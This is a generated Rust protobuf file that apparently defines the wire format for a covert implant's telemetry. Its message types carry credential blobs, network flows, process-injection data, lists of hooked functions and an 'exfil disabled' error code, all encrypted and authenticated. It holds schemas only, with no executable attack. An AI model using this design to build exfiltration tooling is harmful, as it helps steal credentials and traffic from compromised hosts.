// This file is @generated by prost-build.
/// Top-level envelope for all transmissions
#[derive(Clone, PartialEq, ::prost::Message)]
pub struct Envelope {
    /// Obfuscated, non-sequential identifier
    #[prost(fixed64, tag = "1")]
    pub mission_id: u64,
    /// Original collection time
    #[prost(message, optional, tag = "2")]
    pub collected_ts: ::core::option::Option<::prost_types::Timestamp>,
    /// Monotonically increasing per host
    #[prost(fixed32, tag = "3")]
    pub sequence: u32,
    /// HMAC over all prior fields
    #[prost(bytes = "vec", tag = "15")]
    pub hmac_sha256: ::prost::alloc::vec::Vec<u8>,
    #[prost(oneof = "envelope::Payload", tags = "4, 5, 6")]
    pub payload: ::core::option::Option<envelope::Payload>,
}
/// Nested message and enum types in `Envelope`.
pub mod envelope {
    #[derive(Clone, PartialEq, ::prost::Oneof)]
    pub enum Payload {
        #[prost(message, tag = "4")]
        Heartbeat(super::Heartbeat),
        #[prost(message, tag = "5")]
        Data(super::DataBlob),
        #[prost(message, tag = "6")]
        Error(super::Error),
    }
}
/// Keep-alive and health signal
#[derive(Clone, PartialEq, ::prost::Message)]
pub struct Heartbeat {
    #[prost(float, tag = "1")]
    pub load_avg_1m: f32,
    #[prost(uint32, tag = "2")]
    pub mem_free_mb: u32,
    /// Checksum of hooked function names
    #[prost(string, repeated, tag = "3")]
    pub active_hooks: ::prost::alloc::vec::Vec<::prost::alloc::string::String>,
}
/// Primary data container
#[derive(Clone, PartialEq, ::prost::Message)]
pub struct DataBlob {
    /// SHA256 of static host markers
    #[prost(bytes = "vec", tag = "1")]
    pub host_fingerprint: ::prost::alloc::vec::Vec<u8>,
    #[prost(enumeration = "data_blob::DataType", tag = "2")]
    pub data_type: i32,
    /// LZ4(AES-GCM(inner_payload, aad=host_fingerprint))
    #[prost(bytes = "vec", tag = "3")]
    pub encrypted_payload: ::prost::alloc::vec::Vec<u8>,
    /// 12-byte nonce
    #[prost(bytes = "vec", tag = "4")]
    pub aes_gcm_nonce: ::prost::alloc::vec::Vec<u8>,
    /// Uncompressed size for validation
    #[prost(uint32, tag = "5")]
    pub original_size: u32,
}
/// Nested message and enum types in `DataBlob`.
pub mod data_blob {
    #[derive(
        Clone,
        Copy,
        Debug,
        PartialEq,
        Eq,
        Hash,
        PartialOrd,
        Ord,
        ::prost::Enumeration
    )]
    #[repr(i32)]
    pub enum DataType {
        Unspecified = 0,
        CredentialBlob = 1,
        NetworkFlow = 2,
        FileMetadata = 3,
        ProcessInjection = 4,
        ConfigState = 5,
    }
    impl DataType {
        /// String value of the enum field names used in the ProtoBuf definition.
        ///
        /// The values are not transformed in any way and thus are considered stable
        /// (if the ProtoBuf definition does not change) and safe for programmatic use.
        pub fn as_str_name(&self) -> &'static str {
            match self {
                Self::Unspecified => "UNSPECIFIED",
                Self::CredentialBlob => "CREDENTIAL_BLOB",
                Self::NetworkFlow => "NETWORK_FLOW",
                Self::FileMetadata => "FILE_METADATA",
                Self::ProcessInjection => "PROCESS_INJECTION",
                Self::ConfigState => "CONFIG_STATE",
            }
        }
        /// Creates an enum from field names used in the ProtoBuf definition.
        pub fn from_str_name(value: &str) -> ::core::option::Option<Self> {
            match value {
                "UNSPECIFIED" => Some(Self::Unspecified),
                "CREDENTIAL_BLOB" => Some(Self::CredentialBlob),
                "NETWORK_FLOW" => Some(Self::NetworkFlow),
                "FILE_METADATA" => Some(Self::FileMetadata),
                "PROCESS_INJECTION" => Some(Self::ProcessInjection),
                "CONFIG_STATE" => Some(Self::ConfigState),
                _ => None,
            }
        }
    }
}
#[derive(Clone, PartialEq, ::prost::Message)]
pub struct Error {
    #[prost(enumeration = "error::Severity", tag = "1")]
    pub severity: i32,
    /// e.g., "hook_ssl_write", "buffer_alloc"
    #[prost(string, tag = "2")]
    pub context: ::prost::alloc::string::String,
    #[prost(int32, tag = "3")]
    pub errno: i32,
}
/// Nested message and enum types in `Error`.
pub mod error {
    #[derive(
        Clone,
        Copy,
        Debug,
        PartialEq,
        Eq,
        Hash,
        PartialOrd,
        Ord,
        ::prost::Enumeration
    )]
    #[repr(i32)]
    pub enum Severity {
        Unknown = 0,
        HookFailure = 1,
        BufferOverflow = 2,
        ExfilDisabled = 3,
    }
    impl Severity {
        /// String value of the enum field names used in the ProtoBuf definition.
        ///
        /// The values are not transformed in any way and thus are considered stable
        /// (if the ProtoBuf definition does not change) and safe for programmatic use.
        pub fn as_str_name(&self) -> &'static str {
            match self {
                Self::Unknown => "UNKNOWN",
                Self::HookFailure => "HOOK_FAILURE",
                Self::BufferOverflow => "BUFFER_OVERFLOW",
                Self::ExfilDisabled => "EXFIL_DISABLED",
            }
        }
        /// Creates an enum from field names used in the ProtoBuf definition.
        pub fn from_str_name(value: &str) -> ::core::option::Option<Self> {
            match value {
                "UNKNOWN" => Some(Self::Unknown),
                "HOOK_FAILURE" => Some(Self::HookFailure),
                "BUFFER_OVERFLOW" => Some(Self::BufferOverflow),
                "EXFIL_DISABLED" => Some(Self::ExfilDisabled),
                _ => None,
            }
        }
    }
}
